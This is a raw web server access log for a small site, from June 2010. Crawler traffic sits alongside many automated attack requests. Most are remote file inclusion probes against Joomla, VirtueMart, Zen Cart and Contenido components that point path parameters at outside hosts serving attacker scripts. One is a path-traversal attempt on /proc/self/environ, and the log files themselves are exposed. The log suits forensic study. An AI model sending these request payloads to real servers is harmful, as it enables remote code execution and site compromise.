189.108.172.26 - - [25/Jun/2010:17:12:47 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cappa.de/hilfe/bajo-id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
189.108.172.26 - - [25/Jun/2010:17:12:47 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cappa.de/hilfe/bajo-id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
189.108.172.26 - - [25/Jun/2010:17:12:48 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cappa.de/hilfe/bajo-id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
189.108.172.26 - - [25/Jun/2010:17:12:48 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cappa.de/hilfe/bajo-id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
189.108.172.26 - - [25/Jun/2010:17:13:14 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cappa.de/hilfe/bajo-id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
189.108.172.26 - - [25/Jun/2010:17:13:14 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cappa.de/hilfe/bajo-id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
207.46.199.51 - - [25/Jun/2010:17:18:51 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
207.46.199.51 - - [25/Jun/2010:17:19:41 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
77.88.31.246 - - [25/Jun/2010:17:20:25 -0700] "GET /logs/access_100220.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
95.108.150.235 - - [25/Jun/2010:17:22:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [25/Jun/2010:17:22:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [25/Jun/2010:17:22:28 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [25/Jun/2010:17:22:28 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [25/Jun/2010:17:22:29 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [25/Jun/2010:17:22:29 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
67.195.110.174 - - [25/Jun/2010:18:14:37 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
216.18.213.162 - - [25/Jun/2010:18:22:10 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
208.80.193.27 - - [25/Jun/2010:18:31:52 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
112.105.155.82 - - [25/Jun/2010:19:35:40 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
220.136.121.219 - - [25/Jun/2010:20:40:43 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
125.231.226.20 - - [25/Jun/2010:21:24:37 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
81.21.79.214 - - [25/Jun/2010:23:24:12 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.virtualsupplynet.com"
81.21.79.214 - - [25/Jun/2010:23:24:12 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://seiva.tur.br/imagens/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.virtualsupplynet.com"
216.18.213.162 - - [26/Jun/2010:02:23:32 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [26/Jun/2010:03:00:26 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
85.33.247.43 - - [26/Jun/2010:03:02:06 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=hi? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
85.33.247.43 - - [26/Jun/2010:03:02:06 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=hi? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
77.88.31.246 - - [26/Jun/2010:03:14:50 -0700] "GET /logs/access.log HTTP/1.1" 200 5234 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
98.126.74.66 - - [26/Jun/2010:04:44:01 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
114.26.40.244 - - [26/Jun/2010:05:00:46 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
114.42.35.129 - - [26/Jun/2010:06:17:36 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
208.80.193.30 - - [26/Jun/2010:06:40:29 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows 98; .NET CLR 1.1.4322)" "virtualsupplynet.com"
64.94.173.18 - - [26/Jun/2010:08:22:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
64.94.173.18 - - [26/Jun/2010:08:22:34 -0700] "GET /logs/access_100206.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
64.94.173.18 - - [26/Jun/2010:08:22:34 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
64.94.173.18 - - [26/Jun/2010:08:23:50 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
64.94.173.18 - - [26/Jun/2010:08:23:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
64.94.173.18 - - [26/Jun/2010:08:23:50 -0700] "GET /logs/access_100206.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snp.ac.th/style/.cpanel/scripts/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
118.160.34.16 - - [26/Jun/2010:08:51:17 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
110.11.20.41 - - [26/Jun/2010:09:32:17 -0700] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.0" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
110.11.20.41 - - [26/Jun/2010:09:32:18 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
110.11.20.41 - - [26/Jun/2010:09:32:19 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
112.105.103.105 - - [26/Jun/2010:10:27:38 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
112.104.23.53 - - [26/Jun/2010:10:40:19 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:12:42:55 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:12:42:56 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:13:26:00 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:13:26:01 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.virtualsupplynet.com"
125.231.208.112 - - [26/Jun/2010:13:26:33 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
111.248.160.99 - - [26/Jun/2010:13:34:49 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
211.74.92.69 - - [26/Jun/2010:14:10:41 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
193.254.241.12 - - [26/Jun/2010:14:19:30 -0700] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
193.254.241.12 - - [26/Jun/2010:14:19:31 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
193.254.241.12 - - [26/Jun/2010:14:19:31 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:23:06 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:23:15 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
77.88.31.246 - - [26/Jun/2010:14:23:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:23:27 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:23:38 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:23:54 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:24:00 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:24:09 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:24:16 -0700] "GET /logs/ HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:24:23 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:24:33 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
195.239.178.215 - - [26/Jun/2010:14:24:42 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)" "virtualsupplynet.com"
193.4.129.85 - - [26/Jun/2010:14:29:16 -0700] "GET /logs/access_100522.log/errors.php?error=http://game123.interfree.it/id5.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
193.4.129.85 - - [26/Jun/2010:14:29:16 -0700] "GET /errors.php?error=http://game123.interfree.it/id5.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
193.4.129.85 - - [26/Jun/2010:14:29:16 -0700] "GET /logs/errors.php?error=http://game123.interfree.it/id5.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
87.98.188.73 - - [26/Jun/2010:14:43:21 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://game123.interfree.it/id5.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
87.98.188.73 - - [26/Jun/2010:14:43:21 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://game123.interfree.it/id5.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
87.98.188.73 - - [26/Jun/2010:14:43:21 -0700] "GET /logs/access_100522.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://game123.interfree.it/id5.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
216.18.213.162 - - [26/Jun/2010:14:49:04 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
213.175.212.36 - - [26/Jun/2010:15:50:53 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clearpathhealingarts.com/logs/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.virtualsupplynet.com"
213.175.212.36 - - [26/Jun/2010:15:50:53 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clearpathhealingarts.com/logs/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.virtualsupplynet.com"
87.206.204.16 - - [26/Jun/2010:15:51:13 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clearpathhealingarts.com/logs/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
87.206.204.16 - - [26/Jun/2010:15:51:13 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clearpathhealingarts.com/logs/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
85.120.249.147 - - [26/Jun/2010:15:52:15 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
85.120.249.147 - - [26/Jun/2010:15:52:15 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
91.198.130.7 - - [26/Jun/2010:16:07:45 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
91.198.130.7 - - [26/Jun/2010:16:07:45 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
91.198.130.7 - - [26/Jun/2010:16:35:19 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
91.198.130.7 - - [26/Jun/2010:16:35:19 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
88.250.57.232 - - [26/Jun/2010:16:38:02 -0700] "GET /logs/access_100625.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [26/Jun/2010:16:38:03 -0700] "GET /logs/access_100626.log HTTP/1.0" 200 104629 "-" "Wget/1.11.4" "virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:16:50:58 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:16:50:58 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:17:37:22 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:17:37:23 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.virtualsupplynet.com"
84.196.240.90 - - [26/Jun/2010:18:22:47 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/3.0" "www.virtualsupplynet.com"
77.88.31.246 - - [26/Jun/2010:18:48:37 -0700] "GET /logs/access_100508.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
62.44.73.150 - - [26/Jun/2010:19:30:16 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://heart-selena.com/gallery/sql/table.php? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
62.44.73.150 - - [26/Jun/2010:19:30:16 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://heart-selena.com/gallery/sql/table.php? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:19:34:28 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:19:34:29 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:20:00:33 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:20:00:33 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:20:23:17 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:20:23:17 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:21:57:16 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:21:57:16 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:22:26:48 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.virtualsupplynet.com"
188.40.246.135 - - [26/Jun/2010:22:26:48 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.virtualsupplynet.com"
114.43.130.212 - - [26/Jun/2010:22:47:56 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
77.88.31.246 - - [26/Jun/2010:23:14:41 -0700] "GET /logs/access_100605.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
213.171.37.206 - - [27/Jun/2010:00:10:03 -0700] "GET /images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
213.171.37.206 - - [27/Jun/2010:00:10:03 -0700] "GET /logs/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
92.243.84.187 - - [27/Jun/2010:02:05:02 -0700] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 404 - "www.virtualsupplynet.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.virtualsupplynet.com"
174.121.176.46 - - [27/Jun/2010:02:45:10 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
174.121.176.46 - - [27/Jun/2010:02:45:10 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
208.80.193.39 - - [27/Jun/2010:03:42:41 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; E-nrgyPlus; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
213.171.37.206 - - [27/Jun/2010:05:19:40 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
213.171.37.206 - - [27/Jun/2010:05:19:40 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
